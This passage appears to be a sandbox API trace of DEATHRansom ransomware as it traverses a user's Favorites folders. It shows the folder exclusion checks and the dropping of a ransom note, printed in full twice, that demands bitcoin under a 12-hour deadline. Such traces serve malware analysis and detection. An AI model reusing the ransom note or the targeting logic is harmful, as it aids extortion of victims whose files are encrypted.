ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.576] wnsprintfW (in: pszDest=0x8ca1060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\..") returned 52 [0075.576] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.576] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.576] wnsprintfW (in: pszDest=0x8ca1060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0075.576] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0075.576] wnsprintfW (in: pszDest=0x8ca1060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0075.576] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0075.576] wnsprintfW (in: pszDest=0x8ca1060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0075.576] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0075.576] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.576] wnsprintfW (in: pszDest=0x8ca1060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\read_me.txt") returned 61 [0075.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.577] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.577] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.578] CloseHandle (hObject=0x7b4) returned 1 [0075.578] GetProcessHeap () returned 0x4f10000 [0075.578] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ca1060 | out: hHeap=0x4f10000) returned 1 [0075.578] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0075.578] wnsprintfW (in: pszDest=0x8c80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 62 [0075.578] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0075.578] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0075.578] StrStrW (lpFirst="microsoft websites", lpSrch="programdata") returned 0x0 [0075.578] StrStrW (lpFirst="microsoft websites", lpSrch="$recycle.bin") returned 0x0 [0075.578] StrStrW (lpFirst="microsoft websites", lpSrch="program files") returned 0x0 [0075.578] StrStrW (lpFirst="microsoft websites", lpSrch="windows") returned 0x0 [0075.578] StrStrW (lpFirst="microsoft websites", lpSrch="all users") returned 0x0 [0075.578] StrStrW (lpFirst="microsoft websites", lpSrch="appdata") returned 0x0 [0075.578] GetProcessHeap () returned 0x4f10000 [0075.578] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ca1060 [0075.578] lstrcpyW (in: lpString1=0x8ca1060, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0075.578] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 63 [0075.578] QueueUserWorkItem (Function=0x40a710, Context=0x8ca1060, Flags=0x0) returned 1 [0075.578] GetProcessHeap () returned 0x4f10000 [0075.578] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cb1068 [0075.579] wnsprintfW (in: pszDest=0x8cb1068, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*") returned 64 [0075.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.619] wnsprintfW (in: pszDest=0x8cb1068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\.") returned 64 [0075.619] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.619] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.619] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.619] wnsprintfW (in: pszDest=0x8cb1068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\..") returned 65 [0075.619] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.619] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0075.619] wnsprintfW (in: pszDest=0x8cb1068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0075.619] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0075.619] wnsprintfW (in: pszDest=0x8cb1068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0075.619] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0075.619] wnsprintfW (in: pszDest=0x8cb1068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0075.619] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0075.619] wnsprintfW (in: pszDest=0x8cb1068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0075.619] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0075.619] wnsprintfW (in: pszDest=0x8cb1068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0075.619] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0075.619] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.620] wnsprintfW (in: pszDest=0x8cb1068, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\read_me.txt") returned 74 [0075.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.621] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.621] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.622] CloseHandle (hObject=0x7b4) returned 1 [0075.622] GetProcessHeap () returned 0x4f10000 [0075.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cb1068 | out: hHeap=0x4f10000) returned 1 [0075.622] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0075.622] wnsprintfW (in: pszDest=0x8c80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 56 [0075.622] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0075.622] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0075.622] StrStrW (lpFirst="msn websites", lpSrch="programdata") returned 0x0 [0075.622] StrStrW (lpFirst="msn websites", lpSrch="$recycle.bin") returned 0x0 [0075.622] StrStrW (lpFirst="msn websites", lpSrch="program files") returned 0x0 [0075.622] StrStrW (lpFirst="msn websites", lpSrch="windows") returned 0x0 [0075.623] StrStrW (lpFirst="msn websites", lpSrch="all users") returned 0x0 [0075.623] StrStrW (lpFirst="msn websites", lpSrch="appdata") returned 0x0 [0075.623] GetProcessHeap () returned 0x4f10000 [0075.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cb1068 [0075.623] lstrcpyW (in: lpString1=0x8cb1068, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0075.623] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 64 [0075.623] QueueUserWorkItem (Function=0x40a710, Context=0x8cb1068, Flags=0x0) returned 1 [0075.623] GetProcessHeap () returned 0x4f10000 [0075.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cc1070 [0075.624] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*") returned 58 [0075.624] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.685] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\.") returned 58 [0075.685] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.685] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.685] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.685] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\..") returned 59 [0075.685] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.685] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0075.685] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0075.685] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0075.685] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0075.685] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0075.685] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0075.685] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0075.686] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0075.686] FindNextFileW (in: 